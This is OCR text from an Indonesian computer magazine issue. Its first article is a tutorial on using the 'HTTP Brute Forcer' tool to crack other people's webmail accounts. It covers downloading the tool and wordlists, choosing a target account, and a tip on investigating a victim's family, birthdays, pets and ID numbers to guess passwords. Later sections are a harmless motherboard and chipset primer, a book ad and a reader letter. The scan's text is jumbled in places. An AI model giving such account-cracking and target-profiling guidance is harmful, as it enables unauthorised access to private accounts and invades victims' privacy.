Selain dua hal tersebut di atas, masih ada satu hal lagi yang juga tidak kalah pentingnya untuk anda ketahui, yaitu: Bila anda nanti menemukan masalah sewaktu mengoperasikan program HTTP Brute Forcer, atau katakanlah anda 'merasa gagal' pada saat meng-crack account e-mail orang lain, jangan langsung panik. Besar kemungkinan bahwa penyebabnya adalah karena file definisi yang anda pakai sudah tidak upto-date lagi. Oleh karena itu, sebelum benar-benar mengoperasikan HTTP Brute Forcer, pastikanlah bahwa file-file definisi yang ada di dalam komputer anda sudah di-update. nomor urut kata sandi yang sedang diproses, termasuk persentase penyelesaian proses dan password tersisa. Selain itu, kita juga dimungkinkan untuk mem-viewer semua kata sandi yang tidak bisa (gagal) diverifikasi ketika koneksi program ke server sedang bermasalah. Dan, apabila kualitas sambungan (respon) yang diberikan server kepada program tidak terlalu baik, maka program akan mengulangi kembali proses verifikasi kata sandi yang gagal tadi secara otomatis. • Kita dimungkinkan untuk memperagakan semua kata sandi yang sudah selesai di-test, langsung, dalam suatu List Box. • Kita dimungkinkan untuk memperagakan laporan statistik secara penuh sementara proses brute force berlangsung. • Program ini memiliki kemampuan untuk memperagakan respon HTTP/HTML dari server yang di-crack. • Program ini memiliki opsi untuk mem-pause dan meresume proses brute force. Setelah mengetahui semua fitur yang terdapat pada program HTTP Brute Forcer, termasuk hal-hal apa saja yang perlu anda siapkan sebelum mengoperasikannya, maka pada bagian ini akan dijelaskan cara mendapatkan software-nya, menginstalnya, dan mengoperasikannya.

Compatibility Issues
Kemudian, make sure you are aware of compatibility issues. Untuk mendapatkan file-file definisi yang sudah di-update, anda bisa mencarinya ke http://www.hackology.com/. Yang dimaksud dengan compatibility issues adalah masalah kompatibilitas. Munga Bunga memastikan bahwa software yang dibuatnya kompatibel, atau dapat bekerja dengan baik pada sistem operasi Windows 95, 98, dan ME, kecuali Windows 2000, XP, dan NT. Namun demikian, meskipun program HTTP Brute Forcer tidak kompatibel dengan ketiga buah sistem operasi terakhir itu (Windows 2000, XP, dan NT), Munga Bunga mengatakan bahwa you can use it, if you disable the "automatically reconnect to the Internet" option before pressing "Start Hack" in the program. Sekedar tambahan, source code program HTTP Brute Forcer yang dibuat oleh Munga Bunga ditulis menggunakan bahasa pemograman Visual Basic v6.0, dan dikompilasi pada Service Pack (SP) 2 for 32-bit Windows Operating Systems.

Men-Download HTTP Brute Forcer
Program HTTP Brute Forcer, versi terbaru yang tersedia saat ini adalah versi 1.0.2. Software (programnya) bisa anda ambil gratis di http://www.hackology.com/. Sebelum diinstal, ukuran file mentahnya adalah sebesar 1.646 KB, jauh lebih besar dari ukuran file program Brutus Ae2 v.2 yang hanya sebesar 381 KB. Jika anda merasa kesulitan untuk men-download file HTTP Brute Forcer, dapatkan dari CD NeoTek yang disertakan pada majalah ini. Jika tertarik untuk mendapatkan dokumen yang memuat informasi lebih lengkap, kunjungi http://www.hackology.com/programs/readme.htm. Bagi yang 'malas' membuat daftar kombinasi kata (wordlist), kunjungi http://packetstorm.securify.com/Crackers/wordlists/ untuk mengambil beberapa di antaranya.

Fitur HTTP Brute Forcer
Sebagaimana lazimnya program hacking, HTTP Brute Forcer memiliki sejumlah fitur yang membuatnya sedikit berbeda dengan program-program hacking lain yang sejenis. Adapun fitur-fitur yang terdapat pada HTTP Brute Forcer, di antaranya sebagai berikut: • Dimungkinkan melakukan hacking sambil tidur-tiduran (you can hack while you sleep). Artinya, anda tidak harus nongkrongin komputer pada saat program HTTP Brute Forcer beroperasi. Hal itu dimungkinkan karena pada saat program bekerja, program akan selalu mendeteksi apakah koneksi ke Internet dalam keadaan terputus atau tidak. Jika koneksi sudah terputus, maka program menghentikan proses hack, lalu terhubung kembali ke Internet, dan secara otomatis melanjutkan kembali hacking, tanpa memerlukan intervernsi dari pemakai. Khusus untuk fitur yang satu ini, Munga Bunga berani mengatakan “this feature is does not exist in any other brute forcing software!” • Dimungkinkan untuk bekerja/beroperasi pada beberapa thread dalam waktu yang bersamaan. Maksimal 10 thread. Khusus untuk fitur yang kedua ini, Munga Bunga memberi komentar bahwa this is also a very wonderful feature, which I don't see to often at all. Dan hebatnya lagi, dia juga mengatakan bahwa kinerja HTTP Brute Forcer jauh lebih baik, lebih unggul, lebih OK, dan lebih cepat ketimbang software-software lain seperti WWWHack atau EliteSys (Perlu dibuktikan nih!) • Lebih praktis. Itu karena opsi processing yang terdapat pada program ini tidak terlalu banyak. Opsi yang ada hanya untuk melakukan brute forcing terhadap passwords yang terdiri dari lebih dari/atau kurang dari sejumlah karakter yang ditetapkan. • Kita dimungkinkan untuk memperagakan beberapa statistik, misalnya statistik nomor urut kata sandi yang di-loading,

Meng-Install HTTP Brute Forcer
Cara menginstalnya adalah sebagai berikut: 1. Masuk ke dalam direktori tempat anda menyimpan file instalasi HTTP Brute Forcer, kemudian double click file SETUP.EXE untuk memulai proses instalasi. Jika file tersebut masih dalam keadaan terkompres (ZIP), lakukanlah proses uncompress terlebih dahulu. 2. Pada saat anda mengklik file SETUP, pertanyaan pertama yang muncul adalah Do you agree with these terms? Jika anda ingin tetap melanjutkan proses instalasi, jawablah pertanyaan itu dengan mengklik tombol Yes. Kemudian W setelah itu, muncul jendela "Selamat Datang" (Welcome to the Munga Bunga's HTTP Brute Forcer Setup Program), klik tombol Next untuk melanjutkan.

Gambar 3. Menerima perjanjian lisensi penggunaan program

Vol. IV No. 01 NeoTek

37

NeoTekno
Gambar 8. Tampilan proses penyalinan file-file program HTTP Brute Forcer

3. Pada jendela Choose Directory, anda diminta untuk menentukan directory tempat file-file instalasi diletakkan. Jika setuju dengan direktori default yang ditentukan secara otomatis oleh program, klik tombol Next untuk melanjutkan.

Gambar 9. Merestart komputer setelah proses instalasi selesai

Mengoperasikan HTTP Brute Forcer
Sebagaimana yang sudah disebutkan, HTTP Brute Forcer adalah merupakan program hacking yang sangat praktis. Karena kepraktisannya itu pulalah makanya program ini tidak sulit dioperasikan. Untuk mengoperasikan HTTP Brute Forcer dan sekaligus untuk memulai proses hacking/cracking, caranya adalah sebagai berikut: 1. Pertama-tama tentukanlah account e-mail siapa yang ingin anda curi (crack) berikut nama dan alamat webmail-nya. 2. Hubungkan komputer anda ke ISP (Internet). 3. Jalankan program HTTP Brute Forcer yang sudah anda instal tadi, kemudian ketikkan nama user (username) yang akan anda crack ke dalam field Username to brute force

Gambar 5. Menentukan direktori tempat program diletakkan

4. Pada jendela Select Program Folder, anda juga diminta untuk menentukan nama folder program, sama seperti pada point 3. Jika anda tetap setuju dengan pilihan otomatis itu, segera klik tombol Next untuk melanjutkan.

Gambar 10. Tentukan username yang akan di crack Gambar 6. Menentukan nama folder program

S 5. Kemudian, pada jendela terakhir (Start Copying Files), sesaat setelah anda mengklik tombol Next, proses instalasi langsung berjalan, tunggu sampai benar-benar selesai, dan anda diminta untuk me-restart komputer.

4. Masih dari dalam jendela program HTTP Brute Forcer, pada bagian Word List for Passwords, klik tombol Browse untuk menentukan lokasi dan nama file wordlists yang akan dipakai.

Gambar 7. Memulai proses penyalinan file ke dalam hard disk

Gambar 11. Tentukan file wordlists yang akan dipakai

38

NeoTek Vol. IV No. 01

NeoTekno
5. Kemudian, pada bagian Definition File for HTTP and server Information, klik tombol Browse untuk menentukan (memilih) nama file definisi yang sesuai dengan account e-mail dan webmail yang akan menjadi target anda. Dalam hal ini, jika account e-mail yang akan anda crack adalah di Yahoo, maka pilihlah Yahoo!Geocities.DEF sebagai file definisinya. Tip Membuat Daftar kombinasi kata (Wordlist)
ang dimaksud dengan wordlist, adalah kumpulan kata, huruf, dan angka, yang dikombinasikan atau dirangkai sedemikan rupa hingga membentuk sebuah daftar (list). Daftar inilah yang nantinya kemudian dipakai sebagai kata sandi (password) untuk meng-crack account orang lain dengan cara coba-coba (brute force), termasuk account sendiri apabila anda sudah tidak bisa mengingatnya lagi (lupa). Meng-crack kata sandi dengan menggunakan teknik brute force memang suatu usaha yang kemungkinannya untuk berhasil sangat kecil, karena sama saja dengan ibarat mencari jarum ditumpukan jerami. Akan tetapi, bila anda tahu caranya, kemudian anda tekun, ulet, dan sabar, maka kemungkinan yang kecil itu bisa anda perbesar sedikit demi sedikit. Nah, untuk sekedar membantu dan memudahkan anda membuat wordlist, khusus pada bagian ini, akan saya berikan pada anda sedikit tip bagaimana cara membuatnya. Meskipun tip yang saya berikan ini belum tentu terbukti kebenarannya, saya harap anda tidak perlu ragu untuk mencobanya. Tips-nya adalah sebagai berikut: Sebelum anda membuat daftar kombinasi kata (wordlist), ada baiknya terlebih dahulu membuat beberapa ketentuan, misalnya account siapa yang nantinya akan anda crack, jenis kelaminnya, status pekerjaannya, kegemarannya (hobby), dan lain sebagainya. Kemudian, pisahkanlah ketentuan-ketentuan itu menjadi beberapa kategori. Sebagai contoh misalnya, bila jenis kelamin pemilik account yang akan anda crack adalah seorang pria, maka cobalah selidiki kira-kira berapa usianya, apakah sudah menikah atau belum, sudah punya pacar atau belum. Bila dia sudah menikah, selidikilah lagi apakah dia sudah punya anak atau belum. Bila orang tersebut ternyata sudah punya anak, maka mulailah untuk melakukan investigasi langsung melalui rekan sekerjanya atau siapa saja yang kira-kira dekat dengannya. Tanyalah tanggal lahirnya, tanggal lahir anaknya dan isterinya. Kemudian, tanggal berapa mereka mulai menikah pertama kali, siapa nama putrinya, termasuk nama panggilan sayang untuk putri dan isterinya. Selain itu, tanyalah juga berapa nomor rekeningnya, nomor NIP, atau NIK-nya bila dia seorang PNS, pejabat, atau karyawan swasta, termasuk nomer handphone-nya (bila ada). Khusus bagi orang yang belum menikah dan masih berstatus pelajar atau mahasiswa, cobalah selidiki nomor handphone-nya, nomor NIM dan NIRMnya. Kemudian, siapa nama pacarnya (bila ada), nama kesayangan dan tanggal lahir pacarnya, nama personel atau group band favorite-nya. Dan, apabila mereka penyayang binatang, tolong tanyakan nama hewan kesayangannya. Terakhir, kumpulkanlah (rekap) semua informasi/data dari hasil penyelidikan tadi ke dalam sebuah file untuk kemudian di-test satu-persatu. Apabila proses investigasi seperti yang saya sarankan tersebut di atas sangat sulit dan mustahil untuk anda laksanakan, karena jarak dan waktu yang ada pada anda sama sekali tidak memungkinkan, maka gunakanlah beberapa solusi atau alternatif yang lain, misalnya melalui fasilitas search engine atau saluran komunikasi IRC. Karena bisa saja semua informasi yang harus anda kumpulkan tadi sudah tersedia di dalam web atau situs pribadi mereka. Percayalah, bila anda bisa/sanggup melakukan semua hal di atas, saya yakin 99,5% usaha anda pasti tidak akan sia-sia. Jangan pernah lupa, bahwa ketika seseorang akan membuat kata sandi (password), maka nama dan angka yang sangat dekat dan paling mudah untuk diingatlah yang menjadi sandinya.

Y

Gambar 12. Tentukan file definisinya

6. Sebelum anda benar-benar mengklik tombol Start Hack, periksalah terlebih dahulu semua opsi yang ada pada program HTTP Brute Forcer, termasuk Form Method yang akan dipakai. Jika semuanya sudah sesuai dengan skenario yang anda inginkan, kliklah tombol Start Hack untuk segera memulai proses cracking.

Gambar 13. Periksa semua opsi dan form method

7. Pada saat proses cracking sudah berlangsung, mungkin anda sudah merasa agak sedikit lelah, setelah seharian sibuk bekerja (atau kuliah). Bila anda ingin tidur, maka inilah saat yang tepat untuk beranjak dari kursi. Segera tinggalkan komputer anda, cuci kaki dan tangan, lalu pergilah tidur.

Dari Artikel Menjadi Buku

Hacker & Keamanan
Eryanto Sitorus Penerbit ANDI, Yogyakarta Pembaca NeoTek mungkin sudah tidak asing dengan Eryanto Sitorus, salah satu penulis yang aktif di Majalah NeoTek, khususnya tentang hacking dan security. Topik-topik itu juga yang dijadikan judul untuk bukunya yang diterbitkan oleh Penerbit ANDI, Yogyakarta. Buku ini selain berisi artikel-artikel pilihan yang pernah dimuat NeoTek, juga berisi beberapa bab tambahan. Sesuai dengan gaya bahasanya di majalah, buku ini pun sangat mudah dipahami dan enak dibaca. Hacker & Keamanan, 128 hlm. Eryanto Sitorus, Penerbit ANDI Yogyakarta Rp22.500,-

Gambar 14. Proses cracking sedang berlangsung

Vol. IV No. 01 NeoTek

39

NeoTekno

Dasar-dasar Perakitan Komputer
Asalkan memahami komponen-komponen dalam merakit komputer, membeli komputer branded atau rakitan sebenarnya sama saja. Harga komputer rakitan malah lebih fleksibel mengikuti harga pasar. Masalahnya agar tidak kena dibohongi diperlukan pengetahuan dasar mengenai komponen-komponen komputer.
Gambar 1? Apakah anda paham apa yang ditawarkan? Membeli produk teknologi termasuk komputer memerlukan pengetahuan dasar agar tidak terperosok membeli yang kelihatannya murah tapi dalam kenyataannya justru akan menjadi Intel P4 2.4c lebih mahal. Itu semua tergantung pada apa yang MSI 865P Neo 800 MHz FSB 256 Mbyte RAM PC-400 DDR anda butuhkan sekarang 8x AGP, Dual channel DDR dan di masa mendatang. AC97 3D Direct Sound, USB 2.0 Masalahnya lagi, apa 128 Mbyte GeForce 4 FX-5200 yang ‘dibutuhkan’ juga 52x24x52 CD-RW tidak benar-benar jelas 1.44 Floppy Drive ATX case apabila anda tidak memahami aspek-aspek tek- Rp4.500.000,Gambar 1 nis suatu komputer.

M E MAHAM I M OTH E R BOAR D DAN

P

ERNAH MELIHAT PENAWARAN KOMPUTER SEPERTI PADA

Untuk melengkapi artikel ini terdapat Video Mengenal Motherboard pada CD NeoTek dari ASRock

Gambar 2. Baby-AT Form Factor

Mulai dari Motherboard
Biasanya dalam membeli komputer yang pertama kali terlihat adalah prosesornya. Prosesor Pentium IV jelas lebih cepat daripada Pentium III. Prosesor Celeron dianggap prosesor kelas dua dibandingkan Pentium. Dan yang lebih jelas lagi adalah kecepatan prosesor itu. Apabila prosesor relatif mudah dipahami, maka motherboard justru dianggap terlalu rumit dan pemakai biasa tidak terlalu berminat memahaminya. Padahal motherboard sangat penting untuk tempat untuk menampung prosesor danm segala macam perangkat komputer. Belum lagi apabila kelak anda ingin mengekspansi komputer anda. Motherboard adalah circuit board utama dalam komputer yang padanya terpasang prosesor, memory, slot ekspansi, dan terhubung langsung atau tidak langsung dengan segala macam bagian dari komputer. Jadi selain dari prosesor dan memory, motherboard juga berisi banyak controller chip serta banyak piranti lain yang menghubungkan semuanya menjadi satu. Berbagai chip dan piranti lain ini di antaranya: interrupt controller, DMA controller, timer chip, bus controller chip, I/O peripheral interface chip, dan lain-lain. Untuk sementara anda tidak perlu memusingkan semua istilah di atas. Cukup anda kethaui bahwa semua itu dalam komputer mutakhir sekarang disatukan dalam suatu chipset (dikenal sebagai glue logic) dalam bentuk VLSIC (very large scale integrated circuit).

Gambar 3. NLX Form Factor Pada jaman awal PC digunakan motherboard dengan lebar 12 inci (AT Form Factor) yang kemudian dianggap terlalu besar dan digantikan dengan Baby AT. Baby AT Form Factor tidak cocok dengan prosesor Pentium sebab posisi power supply terlalu dekat dengan prosesor. Masalah ini diatasi dengan NLX Form Factor, namun penempatan expansion slot pada card riser membuatnya sulit mengangkat motherboard dan menaikkan biaya perakitan.

Form Factor
Sesuai namanya, Form Factor menunjukkan dimensi fisik motherboard, yaitu panjang dan lebarnya. Ukuran fisik ini menentukan konfigurasi yang dapat ditempatkan pada suatu motherboard. Form Factor yang lebih kecil akan membatasi junlah slot ekspansi yang dapat diletakkan di atasnya.
40

ATX dan Mini-ATX
Pada tahun 1996, Intel memperkenakan ATX Form Factor yang sama sekali bebeda dengan Baby AT format. Ukuran ATX board 12 inci x 9,6 inci sedangkan variannya, MiniATX 11,2 inci x 8,2 inci.

NeoTek Vol. IV No. 01

NeoTekno
FlexATX (1999) adalah perkembangan dari MicroATX dan bersifat backward compatible dengan MicroATX. Ukurannya lebih kecil lagi (9 inci x 7.5 inci). Bahkan VIA Technologies pada tahun 2000 meluncurkan ITX Form Factor dengan ukuran hanya 8,5 x 7,5 inci. Form Factor FlexATX menggunakan arsitektur CNR riser, sedangkan ITX menggunakan arsitektur saingannya, yaitu ACR.

Riser Architecture
Gambar 6 Riser architecture Gambar 4. ATX Form Factor Pada ATX Form Factor, soket prosesor dan regulator voltase dipindah ke sebelah kanan expansion slot. Ini dimungkinkan dengan membuat motherborad yang sedikit lebih lebar dan menciutnya ukuran beberapa jenis komponen seperti Flash BIOS, I/O logic, dan keyboard controller. Dengan rancangan ini keenam expansion slot juga sama sekali tidak terganggu (dua ISA, satu ISA/PCI, dan tiga PCI). ATX juga memungkinkan menyalakan dan mematikan power supply melalui sinyal dari motherboard. Baik pada ATX maupun Mini-ATX segala port serial, paralel, PS/2 keyboard, dan mouse diletakkan pada I/O shield ukuran ganda pada bagian belakang dan disolder langsung pada motherboard. Ini artinya untuk semua itu tidak lagi diperlukan kabel. Dengan demikian motherboard dengan ATX dan Mini-ATX Form Factor membutuhkan casing model baru dan tidak lagi dapat menggunakan AT-style casing. Komputer yang beredar sekarang sudah hampir tidak ada lagi yang menggunakan Baby-AT style casing.

MicroATX dan FlexATX

Gambar 5. MicroATX Form Factor MicroATX yang diperkenalkan akhir tahun 90-an lebih kecil lagi dari ATX. Suatu motherboard yang kompak untuk komputer ekonomis dengan kemampuan ekspansi terbatas. Ukurannya 9,6 inci x 9,6 inci dan dapat menggunakan casing standar ATX maupun rancangan micro-tower. MicroATX juga memungkinkan pemakain power supply yang lebih kecil, tetapi karena ukurannya juga, hanya dapat menampung empat slot ekspansi.

Pada akhir tahun 90-an industri komputer mengembangkan riser architecture yang menurunkan biaya secara keseluruhan selain juga meningkatkan fleksibilitas dalam proses perakitan. Pada tahun 1998 diperkenalkan spesifikasi AMR (Audio/ Modem Riser) yang mendukung fungsi audio dan modem dan teknologi broadband sekaligus. Sayangnya setelah diluncurkan baru diketahui kelemahannya, yaitu tidak mendukung Plug and Play (PnP) selain memakan tempat yang seharusnya dapat digunakan untuk menempatkan konektor PCI. AMR riser terutama terdapat pada motherboard yang ditujukan untuk prosesor Pentium III, sedangkan pada motherboard mutakhir untuk Pentium IV ada beberapa yang tidak lagi memberikan AMR riser, melainkan lebih mementingkan lebih banyak port PCI. Pada motherborad mutakhir juga port ISA sudah tidak terdapat. Spesifikasi baru CNR (Communication and Networking Riser) yang mengatasi masalah pada AMR tapi tidak backward compatible dengannya memungkinkan adanya satu slot saja pada motherboard yang mendukung audio, modem, dan LAN interface. Spesifikasi CNR mendukung lima jenis interface: • AC97 interface: mendukung fungsi audio dan modem • LCI (LAN Connect Interface): mendukung networking 10/100 atau home phone networking • MII (Media Independent Interface): mendukung networking 10/100 atau home phone networking pada interface ini • USB (Universal Serial Bus): mendukung teknologi baru seperti xDSL dan wireless. • SMBus (System Management Bus): memberikan fungsi Plug and Play pada CNR card. Vol. IV No. 01 NeoTek
41

NeoTekno
Spesifikasi ACR yang merupakan saingan CNR didukung oleh 3Com, AMD, VIA Technologies, dan Lucent Technologies. Seperti juga CNR, ACR mendukung modem, audio, LAN, dan xDSL. Disediakan juga pin cadangan untuk mendukung wireless bus di masa yang akan datang. • ACR mengambil tempat salah satu slot PCI sehingga slot PCI berkurang satu buah pada arsitektur model ini, jadi serupa dengan arsitektur AMR pendahulunya. • Walaupun CNR dan AMR memberikan fungsionalitas yang sama, cara implementasinya ber beda: • ACR kompatibel dengan AMR, sedangkan CNR tidak. • ACR mendukung xDSL melalui Integrated Packet Bus (IPB) Technology, sedangkan CNR melalui USB interface. • ACR mendukung LCI (LAN Connect Interface) dan MMI (Media Independent Interface) secara konkuren, sedangkan CNR walaupun mendukung keduanya, tidak dapat menjalankan keduanya secara bersamaan.
Nama 1 Socket 1 2 Socket 2 3 Socket 3 Interface Deskripsi 169-pin 238-pin 237-pin Terdapat pada motherboard 486, beroperasi dengan tegangan 5 volt, mendukung chip 486 plus DX2 dan DX4 overdrive Peningkatan kecil dari Socket 1. Mendukung semua prosesor yang sama serta Pentium overdrive. Beroperasi pada 5 volt, tetapi ditambah kemampuan untuk ber operasi pada 3.3 volt, melalui switch pada motherboard jumper. Mendukung semua chip Socket 2 dengan tambahan 5x86. Meru pakan socket 486 yang terakhir. Socket pertama yang dirancang untuk prosesor kelas Pentium. Beroperasi pada 5 volt dan dengan demikian hanya mendukung low-end Pentium-60/66 dan overdrive chip. Mulai Pentium-75, Intel beralih ke operasi 3.3 volt. Beroperasi pada 3.3 volt dan mendukung chip kelas Pentium 75 MHz sampai 133 MHz. Tidak kompatibel dengan chip Pentium yang lebih baru sebab memerlukan tambahan pin. Dirancang untuk CPU 486 dan merupakan pengembangan dari Socket 3 dan mendukung operasi pada 3.3 volt. Hampir tidak pernah digunakan sebab mun cul bersamaan dengan digantikan nya 486 oleh Pentium. Diperkenalkan untuk Pentium MMX, socket ini memungkinkan men-supply voltase yang terpisah untuk core dan I/O yang digu nakan untuk chip ini maupun chip barikutnya. Interface yang ba nyak digunakan oleh Intel chip clone yang beroperasi pada bus 66 MHz. Khusus digunakan untuk Intel Pentium Pro, socket mahal ini se gera ditinggal olah pabrikan yang beralih ke rancangan cartridge.

4 Socket 4

273-pin

5 Socket 5

320-pin

6 Socket 6

235-pin

7 Socket 7

32-pin

8 Socket 8 9 Slot 1

387-pin

242-way Circuit board dalam paket ini menyediakan sampai 512 KB L1 connector cache yang terdiri dari 2 chip 256 KB yang berjalan pada separuh kecepatan CPU. Digunakan oleh Pentium II, Pentium III, dan Celeron. 330-way Serupa dengan Slot 1 tapi dengan kapasitas L2 cache 2MB yang ber connector jalan pada CPU full speed. Digunakan oleh Pentium II/III Xeon. 242-way Interface AMD yang secara mekanis kompatibel dengan Slot 1, tetapi menggunakan interface elektris yang sama sekali berbeda. Diperke nalkan untuk CPU Athon original. Mulai menggantikan Slot 1 pada jenis-jenis Celeron pada tahun 1999. Juga digunakan oleh Pentium III Coppermine dan Tualatin yang masing-masing dikenal sebagai FC-PGA dab FC-PGA2. Interface AMD yang diperkenalkan untuk prosesor original Athlon (Thunderbird) dengan L2-cache melekat jadi satu (on-die). Selanjut nya digunakan untuk jenis-jenis CPU dari AMD. Diperkenalkan untuk mengakomodasi penambahan pin pada FSB yang sama sekali baru pada Pentium IV. Mencakup Integrated Heat Spreader, yang melindungi cetakan (die) maupun menyediakan permukaan untuk menempatkan heat sink yang besar. Konektor untuk CPU jenis-jenis Pentium IV Xeon. Tambahan pin untuk menyediakan daya yang lebih besar untuk CPU yang akan datang dengan on-die (atau bahkan off-die) L3 cache. Mungkin juga untuk mengakomodasi sinyal inter-processor-communication pada sistem dengan multiple CPU. Diperkenalkan sebagai antisipasi terhadap Intel CPU Pentium IV Northwood 0.13 mikron. Suatu micro Pin Grid Array yang memungkinkan pengurangan ukuran CPU maupun tempat yang diperlukan pada motherboard.

10 Slot 2 11 Slot A

12 Socket 370 370-pin

13 Socket A

462-pin

Gambar 7. Spesifikasi ACR. Spesifikasi ACR sudah menetapkan pin untuk teknologi wireless yang akan datang, sedangkan CNR walaupun sudah mencadangkan pin untuk itu, masih belum menspesifikasikannya.

14 Socket 423 423-pin

15 Socket 603 603-pin

CPU Interface
Untuk memudahkan upgrade, CPU dibentuk dalam format OverDrive, yaitu dapat dipasangkan pada CPU interface. Prosesor 386, 486, Pentium klasik, dan Pentium MMX pada bagian bawahnya mempunyai deretan pin yang dikenal sebagai PGA (Pin Grid Array) dan dipasangkan pada motherboard melalui CPU interface berupa suatu soket. Soket yang masih dipakai sampai sekarang karena dapat menampung segala macam prosesor adalah Soket 7 yang dapat dipasangkan Pentium 75 MHz sampai ke Pentium model

16 Socket 478 478-pin

mutakhir sekarang. Soket 8 diperkenalkan untuk Pentium Pro (1995) tetapi kemudian tidak dipakai lagi karena mahal. Mulai pada Pentium II, konsep soket berpindah ke slot karena prosesor kini terdiri dari core processor dan cache memory chips, namun mulai dengan Pentium III, Intel kembali ke konsep soket.

Gambar 8. Socket-423 untuk Pentium IV dan Socket A untuk AMD Athlon Thunderbird
42

NeoTek Vol. IV No. 01

NeoTekno
Bus Interface
Kemampuan PC untuk beradaptasi dengan perkembangan berbagai macam interface adalah dasar keberhasilannya. Hal ini dimungkinkan dengan konsep bus interface. Bus menghubungkan komponen internal komputer dengan periferal. Suatu sistem dapat menggunakan secara bersama-sama berbagai macam I/O bus system. Jenis-jenis bus yang ada di antaranya: • ISA bus: yang paling tua dan paling lambat dan semakin tidak digunakan. Motherboard untuk Pentium III masih menyediakan ISA bus, tetapi motherboard mutakhir untuk Pentium IV sudah meniadakan bus ini. • PCI bus: bus kelas Pentium yang sekarang digunakan semenjak pertengahan tahun 90-an • USB bus: pengganti serial port yang memungkinkan 127 piranti terhubung secara sekaligus. Pada VGA card yang diranang khusus untuk memanfaatkan AGP slot, data dapat dikirim baik pada saat down clock cyle maupun up clock cycle dan melipatduakan kecepatan clock menjadi 133 MHz dan transfer puncak ke 528 Mbps dan ini dikenal sebagai AGP 2x. AGP versi 2.0 mendukung mode transfer 4x yang lebih cepat dibandingkan transfer data yang dapat dilakukan oleh 100 MHz SDRAM (800 Mbps), sehingga kinerja AGP 4x baru akan kelihatan apabila menggunakan SDRAM 133 MHz. AGP versi 2.0 yang paling mutakhir mendukung data transfer 8x dan dikenal sebagai AGP 8x.

Chipset
Chipset atau PCIset adalah sekelompok microcircuit yang menjadi dirigen terhadap aliran data antara komponenkomponen utama pada sebuah PC, yang mencakup CPU, memory, seconary cache, serta segala macam periferal yang terhubung pada bus ISA atau PCI. Chipset juga mengatur data dari dan ke harddisk melalui channel IDE. Inovasi chipset sama pentingnya dengan inovasi prosesor, namun sementara prosesor banyak mendapat perhatian, chipset cenderung kurang dipahami oleh masyarakat umum. Ada banyak pabrikan chipset seperti SIS, VIA, dan Opti, tetapi yang paling banyak dikenal adalah chipset Triton dari Intel. Perkembangan chipset Triton mengakibatkan revolusi pasar motherboard, mengingat para pabrikan motherboard lebih cenderung menggunakan Triton daripada yang lain. Pada akhir dekade 90-an, Acer Laboratories (ALI), SIS, dan VIA Technologies mengembangkan chipset yang dirancang berjalan untuk prosesor AMD dan Cyrix. Tahun 1998 adalah tahun penting dalam sejarah pengembangan chipset. Pada tahun system bus 66 MHz sudah tidak memadai lagi dan justru saingan-saingan Intel yang mendorong chipset Soket 7 menjadi 100 MHz. Disinilah saingan-saingan Intel memanfaatkan kelengahannya. Sekarang ini chipset untuk Pentium IV mencakup chipset i850E, i845PE, E7205, i875P, dan i865PE dengan kecepatan system bus yang terus meningkat sampai yang sekarang yaitu 800 MHz, jauh di atas 66 MHz sewaktu Intel lengah dalam mengembangkan chipset-nya.
Perbandingan Chipset untuk Sistem Pentium IV
i865PE Prosesor System Bus Memory Module Pentium 4 i875P Pentium 4 E7205 Pentium 4 i845PE Pentium 4 Celeron 533/400 2 doubleside DDR DIMM i850E Pentium 4 Celeron 533/400 4 RIMM

AGP (Accelerated Graphics Port)
Untuk menangani kebutuhan grafis yang semakin tinggi baik untuk video, desain grafis, maupun game, Intel membuat spesifikasi khusus untuk graphics diluar I/O dengan memperkenalkan AGP (Accelerated Graphic Port). AGP port adalah port yang harus anda perhatikan sewaktu memilih motherboard, sebab VGA card yang mutakhir semuanya menggunakan port ini. Memang masih ada VGA card yang menggunakan port PCI, tetapi pilihannya terbatas.
Internal Interface
Standard Pemakaian ISA EISA PCI sound card, modem Burst DTR 2MBps s/d 8.33MBps Perkiraan Pemanfaatan Tidak terpakai lagi pada motherboard untuk Pentium IV Sudah sama sekali tidak terpakai, digantikan oleh PCI

network, SCSI adapter 33MBps graphics card, SCSI adapter, sound card generasi baru grahics card

133MBps Standard add-in peripheral bus (standar bus 32 bit, 33 MHz) 528MBps (2x) Standar untuk semua PC berbasis Intel mulai Pentium II. Eksis ber samaan dengan PCI

AGP

Gambar 9. Aliran data melalui AGP port 2x yang menggantikan port PCI untuk graphics card.

800/533/400 800/533/400 533/400 4 DIMM 4 DIMM 4 DIMM

Memory Type

Dualchannel Dualchannel unbuffered DDR333/266 PC1066 DDR SDRAM DDR SDRAM DDR SDRAM PC800-40 400/333/266 400/333/266 x72 atau PC800-45 x64 DIMM RDRAM 800/400 800/333 533/333 533/266 400/333 400/266 6.4 GBps N/A 2 port ATA 150 8 port USB 2.0 800/400 800/333 533/333 533/266 533/266 400/200 533/333 533/266 400/266 533/PC1066 533/PC800-40 400/PC800-45 400/PC800-40

FSB/Memory Configuration

Peak Memory Bandwidth Error Correction Serial ATA USB

6.4 GBps ECC AGP 8x 2 port ATA 150 8 port USB 2.0

4.2 GBps ECC AGP 8x N/A 6 port USB 2.0

2.7 GBps N/A AGP 4x N/A 6 port USB 2.0

4.2 GBps ECC/Non-ECC AGP 4x N/A 4 port USB 1.1

Graphics Interface AGP 8x

Vol. IV No. 01 NeoTek

43

Inbox

NmN NeoTeker NeoTeker menjawab
Forum ini dimaksudkan sebagai bentuk offline dari mailing list NeoTek di http://groups.yahoo.com/group/majalahneotek.
Saatnya Putar Setir T: Sent Oct 1 Salam untuk semua neoteker dan redaksi neotek, Sudah lama saya tidak masuk ke IRC khususnya channel #neoteker dimana katanya sebagai wadah online penggemar neotek. Hari ini ketika saya masuk, pas ramai-ramainya di channel tersebut. Di situ seru sekali dibahas mengenai deface dan root gaining. Saya sangat terharu (*pret) sekali melihat hal ini. Mereka dengan bangganya berkata hacking is the best sambil pastekan hasil atau log gcc, exploit, atau sekedar log screen finger printing yang mereka lakukan.Alasannya, ini adalah ilmu yang perlu diterapkan. Dan mereka merasa perlu berbangga dengan hal itu. Apakah ini tujuan dibuatnya majalah ini? Saya yakin tidak. Tapi kenapa sampai terjadi? Jelas bukan kesalahan penyampai informasi. Saya sadar itu. Terus terang saya malah semakin ngeri melihatnya. Kengerian saya bukan pada tindakan kriminal mereka. Tapi lebih pada jiwa-jiwa dan pola berpikir yang bersangkutan. Saya bayangkan, bagaimana kalau generasi-generasi kita menjadi generasi perusak dan selalu haus akan pemujaan atas pengrusakan yang mereka lakukan. Saya bangga akan langkah NeoTek memuat beberapa artikel berkaitan dengan dunia hacking (saya lihat lebih cenderung ke cracking). Bahkan beberapa waktu yang lampau saya sempat 